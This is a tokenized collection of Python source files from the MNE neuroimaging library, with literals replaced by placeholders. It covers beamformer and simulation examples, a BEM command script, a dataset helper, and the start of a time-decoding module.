<s> """<STR_LIT>""" <EOL> import mne <EOL> from mne . event import make_fixed_length_events <EOL> from mne . datasets import sample <EOL> from mne . time_frequency import compute_epochs_csd <EOL> from mne . beamformer import tf_dics <EOL> from mne . viz import plot_source_spectrogram <EOL> print ( __doc__ ) <EOL> data_path = sample . data_path ( ) <EOL> raw_fname = data_path + '<STR_LIT>' <EOL> noise_fname = data_path + '<STR_LIT>' <EOL> event_fname = data_path + '<STR_LIT>' <EOL> fname_fwd = data_path + '<STR_LIT>' <EOL> subjects_dir = data_path + '<STR_LIT>' <EOL> label_name = '<STR_LIT>' <EOL> fname_label = data_path + '<STR_LIT>' % label_name <EOL> raw = mne . io . read_raw_fif ( raw_fname , preload = True ) <EOL> raw . info [ '<STR_LIT>' ] = [ '<STR_LIT>' ] <EOL> left_temporal_channels = mne . read_selection ( '<STR_LIT>' ) <EOL> picks = mne . pick_types ( raw . info , meg = '<STR_LIT>' , eeg = False , eog = False , <EOL> stim = False , exclude = '<STR_LIT>' , <EOL> selection = left_temporal_channels ) <EOL> raw . pick_channels ( [ raw . ch_names [ pick ] for pick in picks ] ) <EOL> reject = dict ( mag = <NUM_LIT> ) <EOL> raw . info . normalize_proj ( ) <EOL> tmin , tmax , tstep = - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> <EOL> tmin_plot , tmax_plot = - <NUM_LIT> , <NUM_LIT:0.5> <EOL> event_id = <NUM_LIT:1> <EOL> events = mne . read_events ( event_fname ) <EOL> epochs = mne . Epochs ( raw , events , event_id , tmin , tmax , <EOL> baseline = None , preload = True , proj = True , reject = reject ) <EOL> raw_noise = mne . io . read_raw_fif ( noise_fname , preload = True ) <EOL> raw_noise . info [ '<STR_LIT>' ] = [ '<STR_LIT>' ] <EOL> raw_noise . pick_channels ( [ raw_noise . ch_names [ pick ] for pick in picks ] ) <EOL> raw_noise . info . normalize_proj ( ) <EOL> events_noise = make_fixed_length_events ( raw_noise , event_id ) <EOL> epochs_noise = mne . 
Epochs ( raw_noise , events_noise , event_id , tmin_plot , <EOL> tmax_plot , baseline = None , preload = True , proj = True , <EOL> reject = reject ) <EOL> epochs_noise . info . normalize_proj ( ) <EOL> epochs_noise . apply_proj ( ) <EOL> epochs_noise = epochs_noise [ : len ( epochs . events ) ] <EOL> forward = mne . read_forward_solution ( fname_fwd , surf_ori = True ) <EOL> label = mne . read_label ( fname_label ) <EOL> freq_bins = [ ( <NUM_LIT:4> , <NUM_LIT:12> ) , ( <NUM_LIT:12> , <NUM_LIT:30> ) , ( <NUM_LIT:30> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> ) ] <EOL> win_lengths = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.1> ] <EOL> n_ffts = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> subtract_evoked = False <EOL> noise_csds = [ ] <EOL> for freq_bin , win_length , n_fft in zip ( freq_bins , win_lengths , n_ffts ) : <EOL> noise_csd = compute_epochs_csd ( epochs_noise , mode = '<STR_LIT>' , <EOL> fmin = freq_bin [ <NUM_LIT:0> ] , fmax = freq_bin [ <NUM_LIT:1> ] , <EOL> fsum = True , tmin = - win_length , tmax = <NUM_LIT:0> , <EOL> n_fft = n_fft ) <EOL> noise_csds . append ( noise_csd ) <EOL> stcs = tf_dics ( epochs , forward , noise_csds , tmin , tmax , tstep , win_lengths , <EOL> freq_bins = freq_bins , subtract_evoked = subtract_evoked , <EOL> n_ffts = n_ffts , reg = <NUM_LIT> , label = label ) <EOL> plot_source_spectrogram ( stcs , freq_bins , tmin = tmin_plot , tmax = tmax_plot , <EOL> source_index = None , colorbar = True ) </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> import matplotlib . pyplot as plt <EOL> import mne <EOL> from mne . datasets import sample <EOL> from mne . time_frequency import fit_iir_model_raw <EOL> from mne . viz import plot_sparse_source_estimates <EOL> from mne . simulation import simulate_sparse_stc , simulate_evoked <EOL> print ( __doc__ ) <EOL> data_path = sample . data_path ( ) <EOL> raw = mne . io . read_raw_fif ( data_path + '<STR_LIT>' ) <EOL> proj = mne . read_proj ( data_path + '<STR_LIT>' ) <EOL> raw . info [ '<STR_LIT>' ] += proj <EOL> raw . info [ '<STR_LIT>' ] = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> fwd_fname = data_path + '<STR_LIT>' <EOL> ave_fname = data_path + '<STR_LIT>' <EOL> cov_fname = data_path + '<STR_LIT>' <EOL> fwd = mne . read_forward_solution ( fwd_fname , force_fixed = True , surf_ori = True ) <EOL> fwd = mne . pick_types_forward ( fwd , meg = True , eeg = True , exclude = raw . info [ '<STR_LIT>' ] ) <EOL> cov = mne . read_cov ( cov_fname ) <EOL> info = mne . io . read_info ( ave_fname ) <EOL> label_names = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> labels = [ mne . read_label ( data_path + '<STR_LIT>' % ln ) <EOL> for ln in label_names ] <EOL> times = np . arange ( <NUM_LIT> , dtype = np . float ) / raw . info [ '<STR_LIT>' ] - <NUM_LIT:0.1> <EOL> rng = np . random . RandomState ( <NUM_LIT> ) <EOL> def data_fun ( times ) : <EOL> """<STR_LIT>""" <EOL> return ( <NUM_LIT> * np . sin ( <NUM_LIT> * times ) * <EOL> np . exp ( - ( times - <NUM_LIT> + <NUM_LIT> * rng . randn ( <NUM_LIT:1> ) ) ** <NUM_LIT:2> / <NUM_LIT> ) ) <EOL> stc = simulate_sparse_stc ( fwd [ '<STR_LIT:src>' ] , n_dipoles = <NUM_LIT:2> , times = times , <EOL> random_state = <NUM_LIT> , labels = labels , data_fun = data_fun ) <EOL> picks = mne . pick_types ( raw . 
info , meg = True , exclude = '<STR_LIT>' ) <EOL> iir_filter = fit_iir_model_raw ( raw , order = <NUM_LIT:5> , picks = picks , tmin = <NUM_LIT> , tmax = <NUM_LIT> ) [ <NUM_LIT:1> ] <EOL> snr = <NUM_LIT> <EOL> evoked = simulate_evoked ( fwd , stc , info , cov , snr , iir_filter = iir_filter ) <EOL> plot_sparse_source_estimates ( fwd [ '<STR_LIT:src>' ] , stc , bgcolor = ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ) , <EOL> opacity = <NUM_LIT:0.5> , high_resolution = True ) <EOL> plt . figure ( ) <EOL> plt . psd ( evoked . data [ <NUM_LIT:0> ] ) <EOL> evoked . plot ( ) </s>
<s> """<STR_LIT>""" <EOL> from . _lcmv import lcmv , lcmv_epochs , lcmv_raw , tf_lcmv <EOL> from . _dics import dics , dics_epochs , dics_source_power , tf_dics <EOL> from . _rap_music import rap_music </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> from mne . bem import convert_flash_mris , make_flash_bem <EOL> def run ( ) : <EOL> from mne . commands . utils import get_optparser <EOL> parser = get_optparser ( __file__ ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> help = "<STR_LIT>" , default = None ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> help = "<STR_LIT>" , default = None ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , default = False , <EOL> help = ( "<STR_LIT>" ) , ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , default = False , <EOL> help = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , default = False , <EOL> help = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , default = False , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" , <EOL> default = False ) <EOL> options , args = parser . parse_args ( ) <EOL> subject = options . subject <EOL> subjects_dir = options . subjects_dir <EOL> flash30 = not options . noflash30 <EOL> convert = not options . noconvert <EOL> unwarp = options . unwarp <EOL> overwrite = options . overwrite <EOL> show = options . show <EOL> if options . subject is None : <EOL> parser . 
print_help ( ) <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> convert_flash_mris ( subject = subject , subjects_dir = subjects_dir , <EOL> flash30 = flash30 , convert = convert , unwarp = unwarp ) <EOL> make_flash_bem ( subject = subject , subjects_dir = subjects_dir , <EOL> overwrite = overwrite , show = show ) <EOL> is_main = ( __name__ == '<STR_LIT:__main__>' ) <EOL> if is_main : <EOL> run ( ) </s>
<s> import os . path as op <EOL> from ... utils import verbose <EOL> from ... fixes import partial <EOL> from . . utils import ( has_dataset , _data_path , _get_version , _version_doc , <EOL> _data_path_doc ) <EOL> has_brainstorm_data = partial ( has_dataset , name = '<STR_LIT>' ) <EOL> _description = u"""<STR_LIT>""" <EOL> @ verbose <EOL> def data_path ( path = None , force_update = False , update_path = True , download = True , <EOL> verbose = None ) : <EOL> archive_name = dict ( brainstorm = '<STR_LIT>' ) <EOL> data_path = _data_path ( path = path , force_update = force_update , <EOL> update_path = update_path , name = '<STR_LIT>' , <EOL> download = download , archive_name = archive_name ) <EOL> if data_path != '<STR_LIT>' : <EOL> return op . join ( data_path , '<STR_LIT>' ) <EOL> else : <EOL> return data_path <EOL> _data_path_doc = _data_path_doc . format ( name = '<STR_LIT>' , <EOL> conf = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> _data_path_doc = _data_path_doc . replace ( '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> data_path . __doc__ = _data_path_doc <EOL> def get_version ( ) : <EOL> return _get_version ( '<STR_LIT>' ) <EOL> get_version . __doc__ = _version_doc . format ( name = '<STR_LIT>' ) <EOL> def description ( ) : <EOL> """<STR_LIT>""" <EOL> for desc in _description . splitlines ( ) : <EOL> print ( desc ) </s>
<s> import numpy as np <EOL> import copy <EOL> from . . io . pick import _pick_data_channels <EOL> from . . viz . decoding import plot_gat_matrix , plot_gat_times <EOL> from . . parallel import parallel_func , check_n_jobs <EOL> from . . utils import warn , check_version <EOL> class _DecodingTime ( dict ) : <EOL> """<STR_LIT>""" <EOL> def __repr__ ( self ) : <EOL> s = "<STR_LIT>" <EOL> if "<STR_LIT:start>" in self : <EOL> s += "<STR_LIT>" % ( self [ "<STR_LIT:start>" ] ) <EOL> if "<STR_LIT>" in self : <EOL> s += "<STR_LIT>" % ( self [ "<STR_LIT>" ] ) <EOL> if "<STR_LIT>" in self : <EOL> s += "<STR_LIT>" % ( self [ "<STR_LIT>" ] ) <EOL> if "<STR_LIT>" in self : <EOL> s += "<STR_LIT>" % ( self [ "<STR_LIT>" ] ) <EOL> if "<STR_LIT>" in self : <EOL> depth = [ len ( ii ) for ii in self [ "<STR_LIT>" ] ] <EOL> if len ( np . unique ( depth ) ) == <NUM_LIT:1> : <EOL> if depth [ <NUM_LIT:0> ] == <NUM_LIT:1> : <EOL> s += "<STR_LIT>" % ( len ( depth ) ) <EOL> else : <EOL> s += "<STR_LIT>" % ( len ( depth ) , depth [ <NUM_LIT:0> ] ) <EOL> else : <EOL> s += ( "<STR_LIT>" % <EOL> ( len ( depth ) , <EOL> min ( [ len ( ii ) for ii in depth ] ) , <EOL> max ( ( [ len ( ii ) for ii in depth ] ) ) ) ) <EOL> return "<STR_LIT>" % s <EOL> class _GeneralizationAcrossTime ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , picks = None , cv = <NUM_LIT:5> , clf = None , train_times = None , <EOL> test_times = None , predict_method = '<STR_LIT>' , <EOL> predict_mode = '<STR_LIT>' , scorer = None , n_jobs = <NUM_LIT:1> ) : <EOL> from sklearn . preprocessing import StandardScaler <EOL> from sklearn . linear_model import LogisticRegression <EOL> from sklearn . pipeline import Pipeline <EOL> self . cv = cv <EOL> self . train_times = ( _DecodingTime ( ) if train_times is None <EOL> else _DecodingTime ( train_times ) ) <EOL> if test_times is None : <EOL> self . test_times = _DecodingTime ( ) <EOL> elif test_times == '<STR_LIT>' : <EOL> self . 
test_times = '<STR_LIT>' <EOL> else : <EOL> self . test_times = _DecodingTime ( test_times ) <EOL> if clf is None : <EOL> scaler = StandardScaler ( ) <EOL> estimator = LogisticRegression ( ) <EOL> clf = Pipeline ( [ ( '<STR_LIT>' , scaler ) , ( '<STR_LIT>' , estimator ) ] ) <EOL> self . clf = clf <EOL> self . predict_mode = predict_mode <EOL> self . scorer = scorer <EOL> self . picks = picks <EOL> self . predict_method = predict_method <EOL> self . n_jobs = n_jobs <EOL> def fit ( self , epochs , y = None ) : <EOL> """<STR_LIT>""" <EOL> from sklearn . base import clone <EOL> for att in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] : <EOL> if hasattr ( self , att ) : <EOL> delattr ( self , att ) <EOL> n_jobs = self . n_jobs <EOL> X , y , self . picks_ = _check_epochs_input ( epochs , y , self . picks ) <EOL> self . ch_names = [ epochs . ch_names [ p ] for p in self . picks_ ] <EOL> self . cv_ , self . _cv_splits = _set_cv ( self . cv , clf = self . clf , X = X , y = y ) <EOL> self . y_train_ = y <EOL> self . train_times_ = _sliding_window ( epochs . times , self . train_times , <EOL> epochs . info [ '<STR_LIT>' ] ) <EOL> parallel , p_func , n_jobs = parallel_func ( _fit_slices , n_jobs ) <EOL> n_chunks = min ( len ( self . train_times_ [ '<STR_LIT>' ] ) , n_jobs ) <EOL> time_chunks = np . array_split ( self . train_times_ [ '<STR_LIT>' ] , n_chunks ) <EOL> out = parallel ( p_func ( clone ( self . clf ) , <EOL> X [ ... , np . unique ( np . concatenate ( time_chunk ) ) ] , <EOL> y , time_chunk , self . _cv_splits ) <EOL> for time_chunk in time_chunks ) <EOL> self . estimators_ = sum ( out , list ( ) ) <EOL> return self <EOL> def predict ( self , epochs ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self . clf , self . predict_method ) : <EOL> raise NotImplementedError ( '<STR_LIT>' % ( <EOL> self . clf , self . 
predict_method ) ) <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> if self . predict_mode not in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if self . predict_mode == '<STR_LIT>' : <EOL> n_est_cv = [ len ( estimator ) for estimator in self . estimators_ ] <EOL> heterogeneous_cv = len ( set ( n_est_cv ) ) != <NUM_LIT:1> <EOL> mismatch_cv = n_est_cv [ <NUM_LIT:0> ] != len ( self . _cv_splits ) <EOL> mismatch_y = len ( self . y_train_ ) != len ( epochs ) <EOL> if heterogeneous_cv or mismatch_cv or mismatch_y : <EOL> raise ValueError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> for att in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> if hasattr ( self , att ) : <EOL> delattr ( self , att ) <EOL> _warn_once . clear ( ) <EOL> X , y , _ = _check_epochs_input ( epochs , None , self . picks_ ) <EOL> if not np . all ( [ len ( test ) for train , test in self . _cv_splits ] ) : <EOL> warn ( '<STR_LIT>' ) <EOL> if self . test_times == '<STR_LIT>' : <EOL> test_times = _DecodingTime ( ) <EOL> test_times [ '<STR_LIT>' ] = [ [ s ] for s in self . train_times_ [ '<STR_LIT>' ] ] <EOL> test_times [ '<STR_LIT>' ] = [ [ s ] for s in self . train_times_ [ '<STR_LIT>' ] ] <EOL> elif isinstance ( self . test_times , dict ) : <EOL> test_times = copy . deepcopy ( self . test_times ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' not in test_times : <EOL> if '<STR_LIT>' not in self . train_times_ . keys ( ) : <EOL> ValueError ( '<STR_LIT>' ) <EOL> test_times [ '<STR_LIT>' ] = test_times . get ( '<STR_LIT>' , <EOL> self . train_times_ [ '<STR_LIT>' ] ) <EOL> slices_list = list ( ) <EOL> for _ in range ( len ( self . train_times_ [ '<STR_LIT>' ] ) ) : <EOL> test_times_ = _sliding_window ( epochs . times , test_times , <EOL> epochs . 
info [ '<STR_LIT>' ] ) <EOL> slices_list += [ test_times_ [ '<STR_LIT>' ] ] <EOL> test_times = test_times_ <EOL> test_times [ '<STR_LIT>' ] = slices_list <EOL> test_times [ '<STR_LIT>' ] = [ _set_window_time ( test , epochs . times ) <EOL> for test in test_times [ '<STR_LIT>' ] ] <EOL> for train , tests in zip ( self . train_times_ [ '<STR_LIT>' ] , <EOL> test_times [ '<STR_LIT>' ] ) : <EOL> if not np . all ( [ len ( test ) == len ( train ) for test in tests ] ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . test_times_ = test_times <EOL> n_orig_epochs , _ , n_times = X . shape <EOL> test_epochs = [ ] <EOL> if self . predict_mode == '<STR_LIT>' : <EOL> test_idxs = [ ii for train , test in self . _cv_splits for ii in test ] <EOL> start = <NUM_LIT:0> <EOL> for _ , test in self . _cv_splits : <EOL> n_test_epochs = len ( test ) <EOL> stop = start + n_test_epochs <EOL> test_epochs . append ( slice ( start , stop , <NUM_LIT:1> ) ) <EOL> start += n_test_epochs <EOL> X = X [ test_idxs ] <EOL> parallel , p_func , n_jobs = parallel_func ( _predict_slices , self . n_jobs ) <EOL> n_test_slice = max ( len ( sl ) for sl in self . test_times_ [ '<STR_LIT>' ] ) <EOL> n_chunks = min ( n_test_slice , n_jobs ) <EOL> chunks = [ np . array_split ( slices , n_chunks ) <EOL> for slices in self . test_times_ [ '<STR_LIT>' ] ] <EOL> chunks = map ( list , zip ( * chunks ) ) <EOL> y_pred = parallel ( p_func ( <EOL> estimators = self . estimators_ , cv_splits = self . _cv_splits , <EOL> predict_mode = self . predict_mode , predict_method = self . predict_method , <EOL> n_orig_epochs = n_orig_epochs , test_epochs = test_epochs , <EOL> ** dict ( zip ( [ '<STR_LIT:X>' , '<STR_LIT>' ] , _chunk_data ( X , chunk ) ) ) ) <EOL> for chunk in chunks ) <EOL> n_tests = [ len ( sl ) for sl in self . test_times_ [ '<STR_LIT>' ] ] <EOL> if len ( set ( n_tests ) ) == <NUM_LIT:1> : <EOL> self . y_pred_ = np . concatenate ( y_pred , axis = <NUM_LIT:1> ) <EOL> else : <EOL> self . 
y_pred_ = [ [ test for chunk in train for test in chunk ] <EOL> for train in map ( list , zip ( * y_pred ) ) ] <EOL> return self . y_pred_ <EOL> def score ( self , epochs = None , y = None ) : <EOL> """<STR_LIT>""" <EOL> import sklearn . metrics <EOL> from sklearn . base import is_classifier <EOL> from sklearn . metrics import accuracy_score , mean_squared_error <EOL> if check_version ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> from sklearn . base import is_regressor <EOL> else : <EOL> def is_regressor ( clf ) : <EOL> return False <EOL> if epochs is not None : <EOL> self . predict ( epochs ) <EOL> else : <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . scorer_ = self . scorer <EOL> if self . scorer_ is None : <EOL> if self . predict_method == "<STR_LIT>" : <EOL> if is_classifier ( self . clf ) : <EOL> self . scorer_ = accuracy_score <EOL> elif is_regressor ( self . clf ) : <EOL> self . scorer_ = mean_squared_error <EOL> elif isinstance ( self . scorer_ , str ) : <EOL> if hasattr ( sklearn . metrics , '<STR_LIT>' % self . scorer_ ) : <EOL> self . scorer_ = getattr ( sklearn . metrics , '<STR_LIT>' % <EOL> self . scorer_ ) <EOL> else : <EOL> raise KeyError ( "<STR_LIT>" <EOL> "<STR_LIT>" . format ( self . scorer_ ) ) <EOL> if not self . scorer_ : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT:.>' % ( self . clf , self . predict_method ) ) <EOL> if y is None : <EOL> if self . predict_mode == '<STR_LIT>' : <EOL> y = self . y_train_ <EOL> else : <EOL> if epochs is not None : <EOL> y = epochs . events [ : , <NUM_LIT:2> ] <EOL> else : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if not np . all ( np . unique ( y ) == np . unique ( self . y_train_ ) ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> elif isinstance ( y , list ) : <EOL> y = np . 
array ( y ) <EOL> for att in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> if hasattr ( self , att ) : <EOL> delattr ( self , att ) <EOL> self . y_true_ = y <EOL> n_jobs = min ( len ( self . y_pred_ [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] ) , check_n_jobs ( self . n_jobs ) ) <EOL> parallel , p_func , n_jobs = parallel_func ( _score_slices , n_jobs ) <EOL> n_estimators = len ( self . train_times_ [ '<STR_LIT>' ] ) <EOL> n_chunks = min ( n_estimators , n_jobs ) <EOL> chunks = np . array_split ( range ( len ( self . train_times_ [ '<STR_LIT>' ] ) ) , <EOL> n_chunks ) <EOL> scores = parallel ( p_func ( <EOL> self . y_true_ , [ self . y_pred_ [ train ] for train in chunk ] , <EOL> self . scorer_ ) for chunk in chunks ) <EOL> self . scores_ = np . array ( [ score for chunk in scores for score in chunk ] ) <EOL> return self . scores_ <EOL> _warn_once = dict ( ) <EOL> def _predict_slices ( X , train_times , estimators , cv_splits , predict_mode , <EOL> predict_method , n_orig_epochs , test_epochs ) : <EOL> """<STR_LIT>""" <EOL> n_epochs , _ , n_times = X . shape <EOL> n_train = len ( estimators ) <EOL> n_test = [ len ( test_t_idxs ) for test_t_idxs in train_times ] <EOL> y_pred = None <EOL> for train_t_idx , ( estimator_cv , test_t_idxs ) in enumerate ( <EOL> zip ( estimators , train_times ) ) : <EOL> start = np . arange ( n_times ) <EOL> contiguous_start = np . array_equal ( [ sl [ <NUM_LIT:0> ] for sl in test_t_idxs ] , start ) <EOL> window_lengths = np . unique ( [ len ( sl ) for sl in test_t_idxs ] ) <EOL> vectorize_times = ( window_lengths == <NUM_LIT:1> ) and contiguous_start <EOL> if vectorize_times : <EOL> test_t_idxs = [ slice ( start [ <NUM_LIT:0> ] , start [ - <NUM_LIT:1> ] + <NUM_LIT:1> , <NUM_LIT:1> ) ] <EOL> elif _warn_once . 
get ( '<STR_LIT>' , True ) : <EOL> if len ( test_t_idxs ) > <NUM_LIT:1> : <EOL> warn ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> _warn_once [ '<STR_LIT>' ] = False <EOL> for ii , test_t_idx in enumerate ( test_t_idxs ) : <EOL> X_pred = X <EOL> if not vectorize_times : <EOL> X_pred = X [ : , : , test_t_idx ] . reshape ( n_epochs , - <NUM_LIT:1> ) <EOL> if predict_mode == '<STR_LIT>' : <EOL> y_pred_ = _predict ( X_pred , estimator_cv , <EOL> vectorize_times = vectorize_times , <EOL> predict_method = predict_method ) <EOL> if y_pred is None : <EOL> n_dim = y_pred_ . shape [ - <NUM_LIT:1> ] <EOL> y_pred = _init_ypred ( n_train , n_test , n_orig_epochs , n_dim ) <EOL> if vectorize_times : <EOL> y_pred [ train_t_idx ] [ test_t_idx ] = y_pred_ <EOL> else : <EOL> y_pred [ train_t_idx ] [ ii ] = y_pred_ <EOL> elif predict_mode == '<STR_LIT>' : <EOL> for ( _ , test ) , test_epoch , estimator in zip ( <EOL> cv_splits , test_epochs , estimator_cv ) : <EOL> if test . size == <NUM_LIT:0> : <EOL> continue <EOL> y_pred_ = _predict ( X_pred [ test_epoch ] , [ estimator ] , <EOL> vectorize_times = vectorize_times , <EOL> predict_method = predict_method ) <EOL> if y_pred is None : <EOL> n_dim = y_pred_ . shape [ - <NUM_LIT:1> ] <EOL> y_pred = _init_ypred ( n_train , n_test , n_orig_epochs , <EOL> n_dim ) <EOL> if vectorize_times : <EOL> y_pred [ train_t_idx ] [ test_t_idx , test , ... ] = y_pred_ <EOL> else : <EOL> y_pred [ train_t_idx ] [ ii , test , ... ] = y_pred_ <EOL> return y_pred <EOL> def _init_ypred ( n_train , n_test , n_orig_epochs , n_dim ) : <EOL> """<STR_LIT>""" <EOL> if len ( set ( n_test ) ) == <NUM_LIT:1> : <EOL> y_pred = np . empty ( ( n_train , n_test [ <NUM_LIT:0> ] , n_orig_epochs , n_dim ) ) <EOL> else : <EOL> y_pred = np . array ( [ np . 
empty ( ( this_n , n_orig_epochs , n_dim ) ) <EOL> for this_n in n_test ] ) <EOL> return y_pred <EOL> def _score_slices ( y_true , list_y_pred , scorer ) : <EOL> """<STR_LIT>""" <EOL> scores_list = list ( ) <EOL> for y_pred in list_y_pred : <EOL> scores = list ( ) <EOL> for t , this_y_pred in enumerate ( y_pred ) : <EOL> scores . append ( scorer ( y_true , np . array ( this_y_pred ) ) ) <EOL> scores_list . append ( scores ) <EOL> return scores_list <EOL> def _check_epochs_input ( epochs , y , picks = None ) : <EOL> """<STR_LIT>""" <EOL> if y is None : <EOL> y = epochs . events [ : , <NUM_LIT:2> ] <EOL> elif isinstance ( y , list ) : <EOL> y = np . array ( y ) <EOL> X = epochs . get_data ( ) <EOL> if picks is None : <EOL> picks = _pick_data_channels ( epochs . info , with_ref_meg = False ) <EOL> if isinstance ( picks , ( list , np . ndarray ) ) : <EOL> picks = np . array ( picks , dtype = np . int ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> X = X [ : , picks , : ] <EOL> assert X . shape [ <NUM_LIT:0> ] == y . shape [ <NUM_LIT:0> ] <EOL> return X , y , picks <EOL> def _fit_slices ( clf , x_chunk , y , slices , cv_splits ) : <EOL> """<STR_LIT>""" <EOL> from sklearn . base import clone <EOL> n_epochs = len ( x_chunk ) <EOL> estimators = list ( ) <EOL> values = np . unique ( [ val for sl in slices for val in sl ] ) <EOL> for t_slice in slices : <EOL> t_slice = np . array ( [ np . where ( ii == values ) [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] for ii in t_slice ] ) <EOL> X = x_chunk [ ... , t_slice ] <EOL> X = X . reshape ( n_epochs , np . prod ( X . shape [ <NUM_LIT:1> : ] ) ) <EOL> estimators_ = list ( ) <EOL> for fold , ( train , test ) in enumerate ( cv_splits ) : <EOL> clf_ = clone ( clf ) <EOL> clf_ . fit ( X [ train , : ] , y [ train ] ) <EOL> estimators_ . append ( clf_ ) <EOL> estimators . 
append ( estimators_ ) <EOL> return estimators <EOL> def _sliding_window ( times , window , sfreq ) : <EOL> """<STR_LIT>""" <EOL> import copy <EOL> window = _DecodingTime ( copy . deepcopy ( window ) ) <EOL> time_slices = window . get ( '<STR_LIT>' , None ) <EOL> if time_slices is None : <EOL> window [ '<STR_LIT:start>' ] = window . get ( '<STR_LIT:start>' , times [ <NUM_LIT:0> ] ) <EOL> window [ '<STR_LIT>' ] = window . get ( '<STR_LIT>' , times [ - <NUM_LIT:1> ] ) <EOL> window [ '<STR_LIT>' ] = window . get ( '<STR_LIT>' , <NUM_LIT:1.> / sfreq ) <EOL> window [ '<STR_LIT>' ] = window . get ( '<STR_LIT>' , <NUM_LIT:1.> / sfreq ) <EOL> if not ( times [ <NUM_LIT:0> ] <= window [ '<STR_LIT:start>' ] <= times [ - <NUM_LIT:1> ] ) : <EOL> raise ValueError ( <EOL> '<STR_LIT>' % ( <EOL> window [ '<STR_LIT:start>' ] , times [ <NUM_LIT:0> ] , times [ - <NUM_LIT:1> ] ) ) <EOL> if not ( times [ <NUM_LIT:0> ] <= window [ '<STR_LIT>' ] <= times [ - <NUM_LIT:1> ] ) : <EOL> raise ValueError ( <EOL> '<STR_LIT>' % ( <EOL> window [ '<STR_LIT>' ] , times [ <NUM_LIT:0> ] , times [ - <NUM_LIT:1> ] ) ) <EOL> if window [ '<STR_LIT>' ] < <NUM_LIT:1.> / sfreq : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if window [ '<STR_LIT>' ] < <NUM_LIT:1.> / sfreq : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if window [ '<STR_LIT>' ] > np . ptp ( times ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> def find_t_idx ( t ) : <EOL> return np . argmin ( np . abs ( np . asarray ( times ) - t ) ) <EOL> start = find_t_idx ( window [ '<STR_LIT:start>' ] ) <EOL> stop = find_t_idx ( window [ '<STR_LIT>' ] ) <EOL> step = int ( round ( window [ '<STR_LIT>' ] * sfreq ) ) <EOL> length = int ( round ( window [ '<STR_LIT>' ] * sfreq ) ) <EOL> time_slices = [ range ( start , start + length ) ] <EOL> while ( time_slices [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] + step ) <= ( stop - length + <NUM_LIT:1> ) : <EOL> start = time_slices [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] + step <EOL> time_slices . 
